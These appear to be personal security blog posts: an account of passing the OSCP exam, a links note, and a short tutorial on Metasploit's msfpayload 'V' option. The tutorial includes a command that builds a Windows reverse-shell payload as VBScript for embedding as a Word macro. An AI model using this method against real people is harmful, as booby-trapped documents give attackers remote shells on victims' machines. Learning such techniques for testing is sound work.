A journey’s End…

Well, my experience with Offsec 101 (or PWB) is complete. Finished the course material and the lab time. I took 60 days total, not knowing what I was exactly getting myself into. Also this is not a course where one can just “pop in” for a few hours here and there. Complete concentration for several hours in a row is needed, and this everyday.

This said, I’m pleased to announce that passed the OSCP. Got my official results yesterday.

Can’t go into details about the exam of course, like any certification one agrees (or signs) a NDA. But I suppose It’s safe to say the major part of the exam is breaking into systems. It’s public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this. Also, one would be foolish not to take regular breaks and one or two naps. A tired mind is no good during this period. 24 hours may seems like a long time, but believe me it goes by quickly.

In the end, I accomplished enough of the requirements to pass the exam at hour 22. Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours (2 hour nap, and a good sleep of 4). So it’s very do-able without having to stay awake 24 hours straight.

My experience started on August 8th, 2009 at 10amEDT when I received my exam package with details on what needed to be accomplished. Like the lab environment, certain restrictions are lined out and specific tasks are given. Once I had understood the task(s) at hand, then I could panic. About 30 minutes later, I started hacking away at the lab the way to course showed me. I did not feel “confident” but prepared.

It was hit and miss for a while, lots of information gathered then research needed to be made. After a while, boxes started giving me their most prized possession… administrative rights to their system.

At around 8amEDT the next day, I popped my last machine that necessary points (and then some) to unofficially pass the OSCP challenge… I could relax. From then on, I enjoyed myself a bit more… but didn’t manage to get that last box I wanted (and i was close…) After another nap, I started to clean up my documentation and sent it on its way for evaluation. The rest is history.

Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure. The IRC channel (#offsec) on freenode.net also for the great support, kindness and occasional helping hand…

I highly recommend this certification. If you want to learn new skills, or test out what you know (or think you know) this is the one. It will make you think and adapt.


Good to have links

Here’s a collection of links that are always useful to have handy:
www.offensive-security.com (resource section)

Now I’m sure there are more out there and would be worth adding to this list. If you’ve read my first post, you’ll understand that I’m new to information security… hence my limited knowledge. Feel free to add, if someone ever comments.


Msfpayload ‘V’ option

A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one). Pauldotcom Ep 161

So basically this a client side attack, and in my opinion at pretty nasty one too. Every time I’ve seen someone open up a word document, or excel spreadsheet, either downloaded off the Web or received via e-mail. 99% of the time people either let the macros run or already have the security settings set to low.

What does this mean? Well using the “V” option in msfpayload will output the payload as a vbscript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs of course).

I’ve actually tried it, and it’s pretty funny (and scary) getting a revese shell because I opened a Word document.

So here’s a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST= V > /tmp/vbrshell.bas

Once the file is created, just insert that in a nice Word document..
Here’s another video posted by Mark Baggett which explains the process.

Have fun, and remember to only use this on your local network or with permission of the person to whom you’ll be sending such a file.